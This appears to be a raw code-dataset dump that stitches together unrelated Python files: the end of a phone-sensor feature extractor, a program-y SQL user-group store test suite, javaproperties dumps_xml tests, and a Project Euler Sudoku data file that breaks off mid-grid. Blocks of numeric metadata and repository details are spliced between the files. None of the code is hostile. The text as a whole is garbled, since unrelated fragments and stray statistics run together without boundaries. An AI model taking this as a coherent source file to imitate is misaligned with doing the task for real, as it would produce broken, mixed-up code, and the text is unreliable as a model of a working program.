app_usage_data = self.get_filtered_data(app_usage_data, lambda x: type(x) is dict)
gps_semantic_data = self.get_data_by_stream_name(gpssemantic_stream_name, user_id,
day, localtime=False, ingested_stream=False)
gps_semantic_data = self.get_filtered_data(gps_semantic_data,
lambda x: ((type(x) is str) or (type(x) is np.str_)))
self.process_appusage_context_day_data(user_id, app_usage_data, input_appusage_stream,
gps_semantic_data, input_gpssemanticstream)
if not input_callnumberstream:
self.CC.logging.log("No input stream found FEATURE %s STREAM %s "
"USERID %s" %
(self.__class__.__name__, call_number_stream_name,
str(user_id)))
elif not input_smsnumberstream:
self.CC.logging.log("No input stream found FEATURE %s STREAM %s "
"USERID %s" %
(self.__class__.__name__, sms_number_stream_name,
str(user_id)))
else:
for day in all_days:
callnumberdata = self.get_data_by_stream_name(call_number_stream_name, user_id, day, localtime=False)
callnumberdata = self.get_filtered_data(callnumberdata, lambda x: (type(x) is str))
smsnumberdata = self.get_data_by_stream_name(sms_number_stream_name, user_id, day, localtime=False)
smsnumberdata = self.get_filtered_data(smsnumberdata, lambda x: (type(x) is str))
self.process_callsmsnumber_day_data(user_id, callnumberdata, smsnumberdata, input_callnumberstream,
input_smsnumberstream)
# processing phone activity data related features
if not input_activity_stream:
self.CC.logging.log("No input stream found FEATURE %s STREAM %s "
"USERID %s" %
(self.__class__.__name__, activity_stream_name,
str(user_id)))
else:
for day in all_days:
activity_data = self.get_data_by_stream_name(activity_stream_name, user_id, day, localtime=False)
activity_data = self.get_filtered_data(activity_data, lambda x: (type(x) is list and len(x) == 2))
self.process_phone_activity_day_data(user_id, activity_data, input_activity_stream)
def process(self, user_id: str, all_days: List[str]):
"""
Main processing function inherited from ComputerFeatureBase
:param str user_id: UUID of the user
:param List(str) all_days: List of days with format 'YYYYMMDD'
:return:
"""
if self.CC is not None:
self.CC.logging.log("Processing PhoneFeatures")
streams = self.CC.get_user_streams(user_id)
self.process_data(user_id, streams, all_days)
| 45.990355
| 129
| 0.595002
| 18,085
| 147,813
| 4.671275
| 0.031131
| 0.043572
| 0.023852
| 0.029356
| 0.843537
| 0.819188
| 0.79916
| 0.785784
| 0.77545
| 0.769342
| 0
| 0.009838
| 0.315757
| 147,813
| 3,213
| 130
| 46.004669
| 0.82544
| 0.176026
| 0
| 0.729995
| 0
| 0
| 0.042992
| 0.027663
| 0
| 0
| 0
| 0
| 0
| 1
| 0.036968
| false
| 0
| 0.008891
| 0
| 0.110435
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b155a17e3d137598eacf58491f3f3858bbddc645
| 17,415
|
py
|
Python
|
test/programytest/storage/stores/sql/store/test_usergroups.py
|
cdoebler1/AIML2
|
ee692ec5ea3794cd1bc4cc8ec2a6b5e5c20a0d6a
|
[
"MIT"
] | 345
|
2016-11-23T22:37:04.000Z
|
2022-03-30T20:44:44.000Z
|
test/programytest/storage/stores/sql/store/test_usergroups.py
|
MikeyBeez/program-y
|
00d7a0c7d50062f18f0ab6f4a041068e119ef7f0
|
[
"MIT"
] | 275
|
2016-12-07T10:30:28.000Z
|
2022-02-08T21:28:33.000Z
|
test/programytest/storage/stores/sql/store/test_usergroups.py
|
VProgramMist/modified-program-y
|
f32efcafafd773683b3fe30054d5485fe9002b7d
|
[
"MIT"
] | 159
|
2016-11-28T18:59:30.000Z
|
2022-03-20T18:02:44.000Z
|
import yaml
import unittest.mock
from unittest.mock import patch
import programytest.storage.engines as Engines
from programy.storage.stores.sql.config import SQLStorageConfiguration
from programy.storage.stores.sql.engine import SQLStorageEngine
from programy.storage.stores.sql.store.usergroups import SQLUserGroupStore
from programytest.storage.asserts.store.assert_usergroups import UserGroupsStoreAsserts
from programy.security.authorise.usergroupsauthorisor import BasicUserGroupAuthorisationService
from programy.config.brain.security import BrainSecurityAuthorisationConfiguration
from programy.security.authorise.usergroups import User
from programy.security.authorise.authorisor import AuthorisationException
class SQLUserGroupStoreTests(UserGroupsStoreAsserts):
@unittest.skipIf(Engines.sql is False, Engines.sql_disabled)
def test_initialise(self):
config = SQLStorageConfiguration()
engine = SQLStorageEngine(config)
engine.initialise()
store = SQLUserGroupStore(engine)
self.assertEqual(store.storage_engine, engine)
@unittest.skipIf(Engines.sql is False, Engines.sql_disabled)
def test_get_all(self):
config = SQLStorageConfiguration()
engine = SQLStorageEngine(config)
engine.initialise()
store = SQLUserGroupStore(engine)
with self.assertRaises(Exception):
store._get_all()
@unittest.skipIf(Engines.sql is False, Engines.sql_disabled)
def test_upload_from_file(self):
config = SQLStorageConfiguration()
engine = SQLStorageEngine(config)
engine.initialise()
store = SQLUserGroupStore(engine)
self.assert_upload_from_file(store)
def patch_read_yaml_from_file(self, filename):
raise Exception("Mock Exception")
@unittest.skipIf(Engines.sql is False, Engines.sql_disabled)
@patch("programy.storage.stores.sql.store.usergroups.SQLUserGroupStore._read_yaml_from_file",
patch_read_yaml_from_file)
def test_upload_from_file_exception(self):
config = SQLStorageConfiguration()
engine = SQLStorageEngine(config)
engine.initialise()
store = SQLUserGroupStore(engine)
self.assert_upload_from_file_exception(store)
@unittest.skipIf(Engines.sql is False, Engines.sql_disabled)
def test_upload_from_file_no_collection(self):
config = SQLStorageConfiguration()
engine = SQLStorageEngine(config)
engine.initialise()
store = SQLUserGroupStore(engine)
self.assert_upload_from_file_no_collection(store)
@unittest.skipIf(Engines.sql is False, Engines.sql_disabled)
def test_load_users_user_groups(self):
user = User("console")
config = SQLStorageConfiguration()
engine = SQLStorageEngine(config)
engine.initialise()
store = SQLUserGroupStore(engine)
yaml_data = yaml.load("""
groups:
sysadmin, localuser
""", Loader=yaml.FullLoader)
store._load_users_user_groups(yaml_data, user, "console")
self.assertTrue("sysadmin" in user.groups)
self.assertTrue("localuser" in user.groups)
self.assertFalse("other" in user.groups)
@unittest.skipIf(Engines.sql is False, Engines.sql_disabled)
def test_load_users_user_groups_duplicates(self):
user = User("console")
config = SQLStorageConfiguration()
engine = SQLStorageEngine(config)
engine.initialise()
store = SQLUserGroupStore(engine)
yaml_data = yaml.load("""
groups:
sysadmin, localuser, localuser
""", Loader=yaml.FullLoader)
store._load_users_user_groups(yaml_data, user, "console")
self.assertTrue("sysadmin" in user.groups)
self.assertTrue("localuser" in user.groups)
self.assertFalse("other" in user.groups)
@unittest.skipIf(Engines.sql is False, Engines.sql_disabled)
def test_load_users_user_roles(self):
user = User("console")
config = SQLStorageConfiguration()
engine = SQLStorageEngine(config)
engine.initialise()
store = SQLUserGroupStore(engine)
yaml_data = yaml.load("""
roles:
su, local
""", Loader=yaml.FullLoader)
store._load_users_user_roles(yaml_data, user, "console")
self.assertTrue("su" in user.roles)
self.assertTrue("local" in user.roles)
self.assertFalse("other" in user.roles)
@unittest.skipIf(Engines.sql is False, Engines.sql_disabled)
def test_load_users_user_roles_duplicates(self):
user = User("console")
config = SQLStorageConfiguration()
engine = SQLStorageEngine(config)
engine.initialise()
store = SQLUserGroupStore(engine)
yaml_data = yaml.load("""
roles:
su, local, su
""", Loader=yaml.FullLoader)
store._load_users_user_roles(yaml_data, user, "console")
self.assertTrue("su" in user.roles)
self.assertTrue("local" in user.roles)
self.assertFalse("other" in user.roles)
@unittest.skipIf(Engines.sql is False, Engines.sql_disabled)
def test_load_users(self):
config = SQLStorageConfiguration()
engine = SQLStorageEngine(config)
engine.initialise()
store = SQLUserGroupStore(engine)
yaml_data = yaml.load("""
users:
console:
roles:
user
groups:
sysadmin, local
viewer:
roles:
user
groups:
local
""", Loader=yaml.FullLoader)
store._upload_users(yaml_data, verbose=False)
authorisor = BasicUserGroupAuthorisationService(BrainSecurityAuthorisationConfiguration())
store.load_usergroups(authorisor)
self.assertTrue("console" in authorisor.users)
self.assertTrue("viewer" in authorisor.users)
self.assertFalse("sysadmin" in authorisor.groups)
self.assertFalse("local" in authorisor.groups)
self.assertTrue(authorisor.authorise("console", "user"))
self.assertTrue(authorisor.authorise("viewer", "user"))
@unittest.skipIf(Engines.sql is False, Engines.sql_disabled)
def test_load_users_verbose(self):
config = SQLStorageConfiguration()
engine = SQLStorageEngine(config)
engine.initialise()
store = SQLUserGroupStore(engine)
yaml_data = yaml.load("""
users:
console:
roles:
user
groups:
sysadmin, local
viewer:
roles:
user
groups:
local
""", Loader=yaml.FullLoader)
store.load_from_yaml(yaml_data, verbose=True)
authorisor = BasicUserGroupAuthorisationService(BrainSecurityAuthorisationConfiguration())
store.load_usergroups(authorisor)
self.assertTrue("console" in authorisor.users)
self.assertTrue("viewer" in authorisor.users)
self.assertFalse("sysadmin" in authorisor.groups)
self.assertFalse("local" in authorisor.groups)
self.assertTrue(authorisor.authorise("console", "user"))
self.assertTrue(authorisor.authorise("viewer", "user"))
@unittest.skipIf(Engines.sql is False, Engines.sql_disabled)
def test_load_users_no_users(self):
config = SQLStorageConfiguration()
engine = SQLStorageEngine(config)
engine.initialise()
store = SQLUserGroupStore(engine)
yaml_data = yaml.load("""
other:
console:
roles:
user
groups:
sysadmin, local
viewer:
roles:
user
groups:
local
""", Loader=yaml.FullLoader)
store._upload_users(yaml_data, verbose=True)
authorisor = BasicUserGroupAuthorisationService(BrainSecurityAuthorisationConfiguration())
store.load_usergroups(authorisor)
self.assertFalse("console" in authorisor.users)
self.assertFalse("viewer" in authorisor.users)
self.assertFalse("sysadmin" in authorisor.groups)
self.assertFalse("local" in authorisor.groups)
with self.assertRaises(AuthorisationException):
authorisor.authorise("console", "user")
with self.assertRaises(AuthorisationException):
authorisor.authorise("viewer", "user")
@unittest.skipIf(Engines.sql is False, Engines.sql_disabled)
def test_load_users_no_roles(self):
config = SQLStorageConfiguration()
engine = SQLStorageEngine(config)
engine.initialise()
store = SQLUserGroupStore(engine)
yaml_data = yaml.load("""
users:
console:
groups:
sysadmin, local
viewer:
groups:
local
""", Loader=yaml.FullLoader)
store._upload_users(yaml_data, verbose=True)
authorisor = BasicUserGroupAuthorisationService(BrainSecurityAuthorisationConfiguration())
store.load_usergroups(authorisor)
self.assertTrue("console" in authorisor.users)
self.assertTrue("viewer" in authorisor.users)
self.assertFalse("sysadmin" in authorisor.groups)
self.assertFalse("local" in authorisor.groups)
self.assertFalse(authorisor.authorise("console", "user"))
self.assertFalse(authorisor.authorise("viewer", "user"))
@unittest.skipIf(Engines.sql is False, Engines.sql_disabled)
def test_load_users_no_groups(self):
config = SQLStorageConfiguration()
engine = SQLStorageEngine(config)
engine.initialise()
store = SQLUserGroupStore(engine)
yaml_data = yaml.load("""
users:
console:
roles:
user
viewer:
roles:
user
""", Loader=yaml.FullLoader)
store._upload_users(yaml_data, verbose=True)
authorisor = BasicUserGroupAuthorisationService(BrainSecurityAuthorisationConfiguration())
store.load_usergroups(authorisor)
self.assertTrue("console" in authorisor.users)
self.assertTrue("viewer" in authorisor.users)
self.assertFalse("sysadmin" in authorisor.groups)
self.assertFalse("local" in authorisor.groups)
self.assertTrue(authorisor.authorise("console", "user"))
self.assertTrue(authorisor.authorise("viewer", "user"))
@unittest.skipIf(Engines.sql is False, Engines.sql_disabled)
def test_load_groups(self):
config = SQLStorageConfiguration()
engine = SQLStorageEngine(config)
engine.initialise()
store = SQLUserGroupStore(engine)
store.empty()
yaml_data = yaml.load("""
groups:
group1:
roles:
role1, role2, role3
groups:
group1, group2
users:
user1, user2
group2:
roles:
role4, role5
groups:
group3
users:
user3
""", Loader=yaml.FullLoader)
store._upload_groups(yaml_data, verbose=False)
authorisor = BasicUserGroupAuthorisationService(BrainSecurityAuthorisationConfiguration())
store.load_usergroups(authorisor)
self.assertTrue("group1" in authorisor.groups)
self.assertTrue("group2" in authorisor.groups)
self.assertTrue(authorisor.groups)
@unittest.skipIf(Engines.sql is False, Engines.sql_disabled)
def test_load_groups_verbose(self):
config = SQLStorageConfiguration()
engine = SQLStorageEngine(config)
engine.initialise()
store = SQLUserGroupStore(engine)
yaml_data = yaml.load("""
groups:
group1:
roles:
role1, role2, role3
groups:
group1, group2
users:
user1, user2
group2:
roles:
role4, role5
groups:
group3
users:
user3
""", Loader=yaml.FullLoader)
store._upload_groups(yaml_data, verbose=True)
authorisor = BasicUserGroupAuthorisationService(BrainSecurityAuthorisationConfiguration())
store.load_usergroups(authorisor)
@unittest.skipIf(Engines.sql is False, Engines.sql_disabled)
def test_load_groups_no_groups(self):
config = SQLStorageConfiguration()
engine = SQLStorageEngine(config)
engine.initialise()
store = SQLUserGroupStore(engine)
yaml_data = yaml.load("""
other:
group1:
roles:
role1, role2, role3
groups:
group1, group2
users:
user1, user2
group2:
roles:
role4, role5
groups:
group3
users:
user3
""", Loader=yaml.FullLoader)
store._upload_groups(yaml_data, verbose=False)
authorisor = BasicUserGroupAuthorisationService(BrainSecurityAuthorisationConfiguration())
store.load_usergroups(authorisor)
@unittest.skipIf(Engines.sql is False, Engines.sql_disabled)
def test_load_groups_no_group_roles(self):
config = SQLStorageConfiguration()
engine = SQLStorageEngine(config)
engine.initialise()
store = SQLUserGroupStore(engine)
yaml_data = yaml.load("""
groups:
group1:
groups:
group1, group2
users:
user1, user2
group2:
groups:
group3
users:
user3
""", Loader=yaml.FullLoader)
store._upload_groups(yaml_data, verbose=False)
authorisor = BasicUserGroupAuthorisationService(BrainSecurityAuthorisationConfiguration())
store.load_usergroups(authorisor)
@unittest.skipIf(Engines.sql is False, Engines.sql_disabled)
def test_load_groups_no_group_groups(self):
config = SQLStorageConfiguration()
engine = SQLStorageEngine(config)
engine.initialise()
store = SQLUserGroupStore(engine)
yaml_data = yaml.load("""
groups:
group1:
roles:
role1, role2, role3
users:
user1, user2
group2:
roles:
role4, role5
users:
user3
""", Loader=yaml.FullLoader)
store._upload_groups(yaml_data, verbose=False)
authorisor = BasicUserGroupAuthorisationService(BrainSecurityAuthorisationConfiguration())
store.load_usergroups(authorisor)
@unittest.skipIf(Engines.sql is False, Engines.sql_disabled)
def test_load_groups_no_group_users(self):
config = SQLStorageConfiguration()
engine = SQLStorageEngine(config)
engine.initialise()
store = SQLUserGroupStore(engine)
yaml_data = yaml.load("""
groups:
group1:
roles:
role1, role2, role3
groups:
group1, group2
group2:
roles:
role4, role5
groups:
group3
""", Loader=yaml.FullLoader)
store._upload_groups(yaml_data, verbose=False)
authorisor = BasicUserGroupAuthorisationService(BrainSecurityAuthorisationConfiguration())
store.load_usergroups(authorisor)
@unittest.skipIf(Engines.sql is False, Engines.sql_disabled)
def test_load_usergroups(self):
config = SQLStorageConfiguration()
engine = SQLStorageEngine(config)
engine.initialise()
store = SQLUserGroupStore(engine)
yaml_data = yaml.load("""
users:
user1:
groups:
group1
user2:
groups:
group4
user3:
groups:
group1
groups:
group1:
roles:
role1, role2, role3
groups:
group1, group2
users:
user1, user2
group2:
roles:
role4, role5
groups:
group5
users:
user3
group3:
roles:
role6
""", Loader=yaml.FullLoader)
store.load_from_yaml(yaml_data, verbose=False)
store.commit()
authorisor = BasicUserGroupAuthorisationService(BrainSecurityAuthorisationConfiguration())
store.load_usergroups(authorisor)
self.assertTrue("user1" in authorisor.users)
self.assertTrue("user2" in authorisor.users)
self.assertTrue("user3" in authorisor.users)
self.assertTrue("group1" in authorisor.groups)
self.assertTrue("group2" in authorisor.groups)
self.assertTrue("group3" in authorisor.groups)
self.assertTrue(authorisor.authorise("user3", "role3"))
| 32.071823
| 98
| 0.615619
| 1,531
| 17,415
| 6.866101
| 0.060091
| 0.039954
| 0.041952
| 0.047945
| 0.903919
| 0.874429
| 0.85312
| 0.841134
| 0.841134
| 0.824486
| 0
| 0.008041
| 0.300201
| 17,415
| 543
| 99
| 32.071823
| 0.854517
| 0
| 0
| 0.834842
| 0
| 0
| 0.24845
| 0.004766
| 0
| 0
| 0
| 0
| 0.133484
| 1
| 0.049774
| false
| 0
| 0.027149
| 0
| 0.079186
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
491fe011eee61376f93c6fa1a125b2cde5353a1a
| 3,469
|
py
|
Python
|
test/test_dumps_xml.py
|
asantoso/javaproperties
|
2ca21bd4a69feecde77444c536ff62c221b390e3
|
[
"MIT"
] | null | null | null |
test/test_dumps_xml.py
|
asantoso/javaproperties
|
2ca21bd4a69feecde77444c536ff62c221b390e3
|
[
"MIT"
] | null | null | null |
test/test_dumps_xml.py
|
asantoso/javaproperties
|
2ca21bd4a69feecde77444c536ff62c221b390e3
|
[
"MIT"
] | null | null | null |
from __future__ import unicode_literals
from collections import OrderedDict
from javaproperties import dumps_xml
def test_dumps_xml_nothing():
assert dumps_xml({}) == '''\
<!DOCTYPE properties SYSTEM "http://java.sun.com/dtd/properties.dtd">
<properties>
</properties>
'''
def test_dumps_xml_simple():
assert dumps_xml({"key": "value"}) == '''\
<!DOCTYPE properties SYSTEM "http://java.sun.com/dtd/properties.dtd">
<properties>
<entry key="key">value</entry>
</properties>
'''
def test_dumps_xml_two_simple():
assert dumps_xml([("key", "value"), ("zebra", "apple")]) == '''\
<!DOCTYPE properties SYSTEM "http://java.sun.com/dtd/properties.dtd">
<properties>
<entry key="key">value</entry>
<entry key="zebra">apple</entry>
</properties>
'''
def test_dumps_xml_two_simple_rev():
assert dumps_xml([("zebra", "apple"), ("key", "value")]) == '''\
<!DOCTYPE properties SYSTEM "http://java.sun.com/dtd/properties.dtd">
<properties>
<entry key="zebra">apple</entry>
<entry key="key">value</entry>
</properties>
'''
def test_dumps_xml_two_simple_sorted():
assert dumps_xml(
[("key", "value"), ("zebra", "apple")],
sort_keys=True,
) == '''\
<!DOCTYPE properties SYSTEM "http://java.sun.com/dtd/properties.dtd">
<properties>
<entry key="key">value</entry>
<entry key="zebra">apple</entry>
</properties>
'''
def test_dumps_xml_two_simple_rev_sorted():
assert dumps_xml(
[("zebra", "apple"), ("key", "value")],
sort_keys=True,
) == '''\
<!DOCTYPE properties SYSTEM "http://java.sun.com/dtd/properties.dtd">
<properties>
<entry key="key">value</entry>
<entry key="zebra">apple</entry>
</properties>
'''
def test_dumps_xml_ordereddict():
assert dumps_xml(OrderedDict([("key","value"), ("zebra","apple")])) == '''\
<!DOCTYPE properties SYSTEM "http://java.sun.com/dtd/properties.dtd">
<properties>
<entry key="key">value</entry>
<entry key="zebra">apple</entry>
</properties>
'''
def test_dumps_xml_ordereddict_rev():
assert dumps_xml(OrderedDict([("zebra","apple"), ("key","value")])) == '''\
<!DOCTYPE properties SYSTEM "http://java.sun.com/dtd/properties.dtd">
<properties>
<entry key="zebra">apple</entry>
<entry key="key">value</entry>
</properties>
'''
def test_dumps_xml_ordereddict_sorted():
assert dumps_xml(
OrderedDict([("key", "value"), ("zebra", "apple")]),
sort_keys=True,
) == '''\
<!DOCTYPE properties SYSTEM "http://java.sun.com/dtd/properties.dtd">
<properties>
<entry key="key">value</entry>
<entry key="zebra">apple</entry>
</properties>
'''
def test_dumps_xml_ordereddict_rev_sorted():
assert dumps_xml(
OrderedDict([("zebra", "apple"), ("key", "value")]),
sort_keys=True,
) == '''\
<!DOCTYPE properties SYSTEM "http://java.sun.com/dtd/properties.dtd">
<properties>
<entry key="key">value</entry>
<entry key="zebra">apple</entry>
</properties>
'''
def test_dumps_xml_comment():
assert dumps_xml({"key": "value"}, comment='This is a comment.') == '''\
<!DOCTYPE properties SYSTEM "http://java.sun.com/dtd/properties.dtd">
<properties>
<comment>This is a comment.</comment>
<entry key="key">value</entry>
</properties>
'''
def test_dumps_xml_entities():
assert dumps_xml({'&<>"\'': '&<>"\''}, comment='&<>"\'') == '''\
<!DOCTYPE properties SYSTEM "http://java.sun.com/dtd/properties.dtd">
<properties>
<comment>&<>"'</comment>
<entry key="&<>"'">&<>"'</entry>
</properties>
'''
| 28.669421
| 79
| 0.659268
| 435
| 3,469
| 5.096552
| 0.098851
| 0.090212
| 0.064953
| 0.081191
| 0.897158
| 0.85521
| 0.846189
| 0.815968
| 0.770862
| 0.770862
| 0
| 0
| 0.11646
| 3,469
| 120
| 80
| 28.908333
| 0.723328
| 0
| 0
| 0.722222
| 0
| 0
| 0.604209
| 0.14817
| 0
| 0
| 0
| 0
| 0.111111
| 1
| 0.111111
| true
| 0
| 0.027778
| 0
| 0.138889
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
4924b704b9c29e0a653b674acdbf7bcd84eecae4
| 10,626
|
py
|
Python
|
data/p096.py
|
joetache4/ProjectEuler
|
f101e927d73dbafa11af1b208992bf0d830c88b1
|
[
"MIT"
] | null | null | null |
data/p096.py
|
joetache4/ProjectEuler
|
f101e927d73dbafa11af1b208992bf0d830c88b1
|
[
"MIT"
] | null | null | null |
data/p096.py
|
joetache4/ProjectEuler
|
f101e927d73dbafa11af1b208992bf0d830c88b1
|
[
"MIT"
] | null | null | null |
def get_data():
return [[\
[0,0,3,0,2,0,6,0,0],\
[9,0,0,3,0,5,0,0,1],\
[0,0,1,8,0,6,4,0,0],\
[0,0,8,1,0,2,9,0,0],\
[7,0,0,0,0,0,0,0,8],\
[0,0,6,7,0,8,2,0,0],\
[0,0,2,6,0,9,5,0,0],\
[8,0,0,2,0,3,0,0,9],\
[0,0,5,0,1,0,3,0,0]\
],[\
[2,0,0,0,8,0,3,0,0],\
[0,6,0,0,7,0,0,8,4],\
[0,3,0,5,0,0,2,0,9],\
[0,0,0,1,0,5,4,0,8],\
[0,0,0,0,0,0,0,0,0],\
[4,0,2,7,0,6,0,0,0],\
[3,0,1,0,0,7,0,4,0],\
[7,2,0,0,4,0,0,6,0],\
[0,0,4,0,1,0,0,0,3]\
],[\
[0,0,0,0,0,0,9,0,7],\
[0,0,0,4,2,0,1,8,0],\
[0,0,0,7,0,5,0,2,6],\
[1,0,0,9,0,4,0,0,0],\
[0,5,0,0,0,0,0,4,0],\
[0,0,0,5,0,7,0,0,9],\
[9,2,0,1,0,8,0,0,0],\
[0,3,4,0,5,9,0,0,0],\
[5,0,7,0,0,0,0,0,0]\
],[\
[0,3,0,0,5,0,0,4,0],\
[0,0,8,0,1,0,5,0,0],\
[4,6,0,0,0,0,0,1,2],\
[0,7,0,5,0,2,0,8,0],\
[0,0,0,6,0,3,0,0,0],\
[0,4,0,1,0,9,0,3,0],\
[2,5,0,0,0,0,0,9,8],\
[0,0,1,0,2,0,6,0,0],\
[0,8,0,0,6,0,0,2,0]\
],[\
[0,2,0,8,1,0,7,4,0],\
[7,0,0,0,0,3,1,0,0],\
[0,9,0,0,0,2,8,0,5],\
[0,0,9,0,4,0,0,8,7],\
[4,0,0,2,0,8,0,0,3],\
[1,6,0,0,3,0,2,0,0],\
[3,0,2,7,0,0,0,6,0],\
[0,0,5,6,0,0,0,0,8],\
[0,7,6,0,5,1,0,9,0]\
],[\
[1,0,0,9,2,0,0,0,0],\
[5,2,4,0,1,0,0,0,0],\
[0,0,0,0,0,0,0,7,0],\
[0,5,0,0,0,8,1,0,2],\
[0,0,0,0,0,0,0,0,0],\
[4,0,2,7,0,0,0,9,0],\
[0,6,0,0,0,0,0,0,0],\
[0,0,0,0,3,0,9,4,5],\
[0,0,0,0,7,1,0,0,6]\
],[\
[0,4,3,0,8,0,2,5,0],\
[6,0,0,0,0,0,0,0,0],\
[0,0,0,0,0,1,0,9,4],\
[9,0,0,0,0,4,0,7,0],\
[0,0,0,6,0,8,0,0,0],\
[0,1,0,2,0,0,0,0,3],\
[8,2,0,5,0,0,0,0,0],\
[0,0,0,0,0,0,0,0,5],\
[0,3,4,0,9,0,7,1,0]\
],[\
[4,8,0,0,0,6,9,0,2],\
[0,0,2,0,0,8,0,0,1],\
[9,0,0,3,7,0,0,6,0],\
[8,4,0,0,1,0,2,0,0],\
[0,0,3,7,0,4,1,0,0],\
[0,0,1,0,6,0,0,4,9],\
[0,2,0,0,8,5,0,0,7],\
[7,0,0,9,0,0,6,0,0],\
[6,0,9,2,0,0,0,1,8]\
],[\
[0,0,0,9,0,0,0,0,2],\
[0,5,0,1,2,3,4,0,0],\
[0,3,0,0,0,0,1,6,0],\
[9,0,8,0,0,0,0,0,0],\
[0,7,0,0,0,0,0,9,0],\
[0,0,0,0,0,0,2,0,5],\
[0,9,1,0,0,0,0,5,0],\
[0,0,7,4,3,9,0,2,0],\
[4,0,0,0,0,7,0,0,0]\
],[\
[0,0,1,9,0,0,0,0,3],\
[9,0,0,7,0,0,1,6,0],\
[0,3,0,0,0,5,0,0,7],\
[0,5,0,0,0,0,0,0,9],\
[0,0,4,3,0,2,6,0,0],\
[2,0,0,0,0,0,0,7,0],\
[6,0,0,1,0,0,0,3,0],\
[0,4,2,0,0,7,0,0,6],\
[5,0,0,0,0,6,8,0,0]\
],[\
[0,0,0,1,2,5,4,0,0],\
[0,0,8,4,0,0,0,0,0],\
[4,2,0,8,0,0,0,0,0],\
[0,3,0,0,0,0,0,9,5],\
[0,6,0,9,0,2,0,1,0],\
[5,1,0,0,0,0,0,6,0],\
[0,0,0,0,0,3,0,4,9],\
[0,0,0,0,0,7,2,0,0],\
[0,0,1,2,9,8,0,0,0]\
],[\
[0,6,2,3,4,0,7,5,0],\
[1,0,0,0,0,5,6,0,0],\
[5,7,0,0,0,0,0,4,0],\
[0,0,0,0,9,4,8,0,0],\
[4,0,0,0,0,0,0,0,6],\
[0,0,5,8,3,0,0,0,0],\
[0,3,0,0,0,0,0,9,1],\
[0,0,6,4,0,0,0,0,7],\
[0,5,9,0,8,3,2,6,0]\
],[\
[3,0,0,0,0,0,0,0,0],\
[0,0,5,0,0,9,0,0,0],\
[2,0,0,5,0,4,0,0,0],\
[0,2,0,0,0,0,7,0,0],\
[1,6,0,0,0,0,0,5,8],\
[7,0,4,3,1,0,6,0,0],\
[0,0,0,8,9,0,1,0,0],\
[0,0,0,0,6,7,0,8,0],\
[0,0,0,0,0,5,4,3,7]\
],[\
[6,3,0,0,0,0,0,0,0],\
[0,0,0,5,0,0,0,0,8],\
[0,0,5,6,7,4,0,0,0],\
[0,0,0,0,2,0,0,0,0],\
[0,0,3,4,0,1,0,2,0],\
[0,0,0,0,0,0,3,4,5],\
[0,0,0,0,0,7,0,0,4],\
[0,8,0,3,0,0,9,0,2],\
[9,4,7,1,0,0,0,8,0]\
],[\
[0,0,0,0,2,0,0,4,0],\
[0,0,8,0,3,5,0,0,0],\
[0,0,0,0,7,0,6,0,2],\
[0,3,1,0,4,6,9,7,0],\
[2,0,0,0,0,0,0,0,0],\
[0,0,0,5,0,1,2,0,3],\
[0,4,9,0,0,0,7,3,0],\
[0,0,0,0,0,0,0,1,0],\
[8,0,0,0,0,4,0,0,0]\
],[\
[3,6,1,0,2,5,9,0,0],\
[0,8,0,9,6,0,0,1,0],\
[4,0,0,0,0,0,0,5,7],\
[0,0,8,0,0,0,4,7,1],\
[0,0,0,6,0,3,0,0,0],\
[2,5,9,0,0,0,8,0,0],\
[7,4,0,0,0,0,0,0,5],\
[0,2,0,0,1,8,0,6,0],\
[0,0,5,4,7,0,3,2,9]\
],[\
[0,5,0,8,0,7,0,2,0],\
[6,0,0,0,1,0,0,9,0],\
[7,0,2,5,4,0,0,0,6],\
[0,7,0,0,2,0,3,0,1],\
[5,0,4,0,0,0,9,0,8],\
[1,0,3,0,8,0,0,7,0],\
[9,0,0,0,7,6,2,0,5],\
[0,6,0,0,9,0,0,0,3],\
[0,8,0,1,0,3,0,4,0]\
],[\
[0,8,0,0,0,5,0,0,0],\
[0,0,0,0,0,3,4,5,7],\
[0,0,0,0,7,0,8,0,9],\
[0,6,0,4,0,0,9,0,3],\
[0,0,7,0,1,0,5,0,0],\
[4,0,8,0,0,7,0,2,0],\
[9,0,1,0,2,0,0,0,0],\
[8,4,2,3,0,0,0,0,0],\
[0,0,0,1,0,0,0,8,0]\
],[\
[0,0,3,5,0,2,9,0,0],\
[0,0,0,0,4,0,0,0,0],\
[1,0,6,0,0,0,3,0,5],\
[9,0,0,2,5,1,0,0,8],\
[0,7,0,4,0,8,0,3,0],\
[8,0,0,7,6,3,0,0,1],\
[3,0,8,0,0,0,1,0,4],\
[0,0,0,0,2,0,0,0,0],\
[0,0,5,1,0,4,8,0,0]\
],[\
[0,0,0,0,0,0,0,0,0],\
[0,0,9,8,0,5,1,0,0],\
[0,5,1,9,0,7,4,2,0],\
[2,9,0,4,0,1,0,6,5],\
[0,0,0,0,0,0,0,0,0],\
[1,4,0,5,0,8,0,9,3],\
[0,2,6,7,0,9,5,8,0],\
[0,0,5,1,0,3,6,0,0],\
[0,0,0,0,0,0,0,0,0]\
],[\
[0,2,0,0,3,0,0,9,0],\
[0,0,0,9,0,7,0,0,0],\
[9,0,0,2,0,8,0,0,5],\
[0,0,4,8,0,6,5,0,0],\
[6,0,7,0,0,0,2,0,8],\
[0,0,3,1,0,2,9,0,0],\
[8,0,0,6,0,5,0,0,7],\
[0,0,0,3,0,9,0,0,0],\
[0,3,0,0,2,0,0,5,0]\
],[\
[0,0,5,0,0,0,0,0,6],\
[0,7,0,0,0,9,0,2,0],\
[0,0,0,5,0,0,1,0,7],\
[8,0,4,1,5,0,0,0,0],\
[0,0,0,8,0,3,0,0,0],\
[0,0,0,0,9,2,8,0,5],\
